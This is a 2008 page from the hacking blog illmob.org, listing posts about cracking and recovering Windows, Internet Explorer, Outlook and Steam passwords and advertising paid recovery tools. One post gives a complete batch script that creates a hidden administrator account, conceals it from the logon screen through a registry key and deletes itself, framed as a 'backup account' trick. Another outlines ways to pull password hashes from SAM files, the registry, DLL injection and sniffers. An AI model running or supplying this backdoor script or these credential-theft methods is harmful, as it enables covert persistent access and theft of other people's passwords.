illmob.org

lm2ntcrack : NT Hash cracker from LM Password

October 19th, 2008 by admin in News, Password Info, windows

lm2ntcrack provides a simple way to crack instantly Microsoft Windows NT Hash (MD4) when the LM Password is known. lm2ntcrack is Free and Open Source software.
This software is entirely written in Perl, so its easily ported and installed.
(more…)

Create A Hidden User on XP/VISTA

October 11th, 2008 by admin in Password Info, Uncategorized, windows

Nice little .bat script trick from illwill @ illmob.org that will create user who’s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It’s great for a backup account.

@echo off
rem HideUser.bat 
rem by illwill    http://illmob.org
rem This will create a hidden user with admin rights in XP/Vista
rem ( hidden meaning that the username wont appear in the logon screen)
rem change the illwill & passw0rd to your own
rem Add once you log into your new account dont forget to hide the user folder
rem "attrib +r +a +s +h %USERPROFILE%"


SET NEWUSER=adm1n
SET PASS=passw0rd

net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1
reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1
DEL %0

GPU Cracking wars have begun…

October 3rd, 2008 by admin in Password Info, Uncategorized, windows

ElcomSoft Claims 1 Billion Passwords/Sec Recovery; Uses GPUs in Parallel
Distributes tasks to multiple NVIDIA video accelerators

ElcomSoft has released a new version its Distributed Password Recovery program for recovering system and document passwords at speeds of up to 1 billion passwords per second. (more…)

IE Recover 1.0

September 27th, 2008 by admin in Files, News, Our Tools, Password Info, windows

When you visit website ftp site in Internet Explorer version 4.x-6.x and you choose the “Remember password” when you login, the password is saved in the Protected Storage in the registry, and this utility can recover it.

The Protected Storage information is saved in a special location in the Registry. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted. Also, some passwords data are hidden by the operating system.

IE Recover

We are releasing a Demo version of IE Recover that recovers the first 3 characters of your password.


Download IE Recover Demo

[downloadcounter(IERecover)] downloads

The full version is available for $4.99 that shows the complete password.
Built in pure Assembly language this program is only 7kb and fits perfectly on a thumbdrive to carry with you anywhere.

Help support this site by purchasing it ,so we can continue to off you the latest password recovery info.

You can purchase through paypal or e-gold from the links below. Thank you.

Pay Now with e-gold...

Outlook Recover 1.0

September 15th, 2008 by Dev Team in News, Our Tools, Password Info, windows

When you create a mail account in Outlook Express or a POP3 account in Microsoft Outlook, and you choose the “Remember password” option in the account properties, the password is saved in the Protected Storage in the registry, and this utility can recover it.

The Protected Storage information is saved in a special location in the Registry. The base key of the Protected Storage is located under the following key: “HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”
You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted. Also, some passwords data are hidden by the operating system.

Outlook Recover

We are releasing a Demo version of Outlook Recover that recovers the first 3 characters of your password.

[smartcounter:9]

The full version is available for $2.99 that shows the complete password.

Built in pure Assembler language this program is only 7kb and fits perfectly on a thumbdrive to carry with you anywhere.

Help support this site by purchasing it ,so we can continue to build and maintain resources that is relied on by IT techs / people in all kinds of situations.

You can purchase through paypal or e-gold from the links below. Thank you.

Pay Now with e-gold...

Steam Password Save Flaw

September 8th, 2008 by admin in Gaming, Password Info

Valve is a game software company who makes popular software titles such as Half-Life and Counterstrike and distributes them through a program called Steam. It’s passwords are are encrypted with AES encryption using a key from a combination of 3 concatenated registry keys:
(more…)

Recovering Internet Explorer Passwords: Theory and Practice

July 6th, 2008 by Dev Team in News, Password Info, windows

Brief introduction on how Internet Explorer stores its passwords

(more…)

Windows Password Recovery Tools

March 13th, 2008 by Dev Team in Files, Password Info, windows

There are several ways to obtain password hashes, depending on their location and existing access. Password hashes can be obtained from SAM file or its backup, directly from local or remote computer registry, from registry or Active Directory on local or remote computer by means of DLL injection, from a network sniffer. The SAM file located in the %SystemRoot%\system32\config directory or %SystemRoot%\repair directory. It is also possible to recover the password itself from memory.

Here’s a few free tools to help you recover lost/unknown Windows passwords, most come with the source code included. (more…)

« Previous Article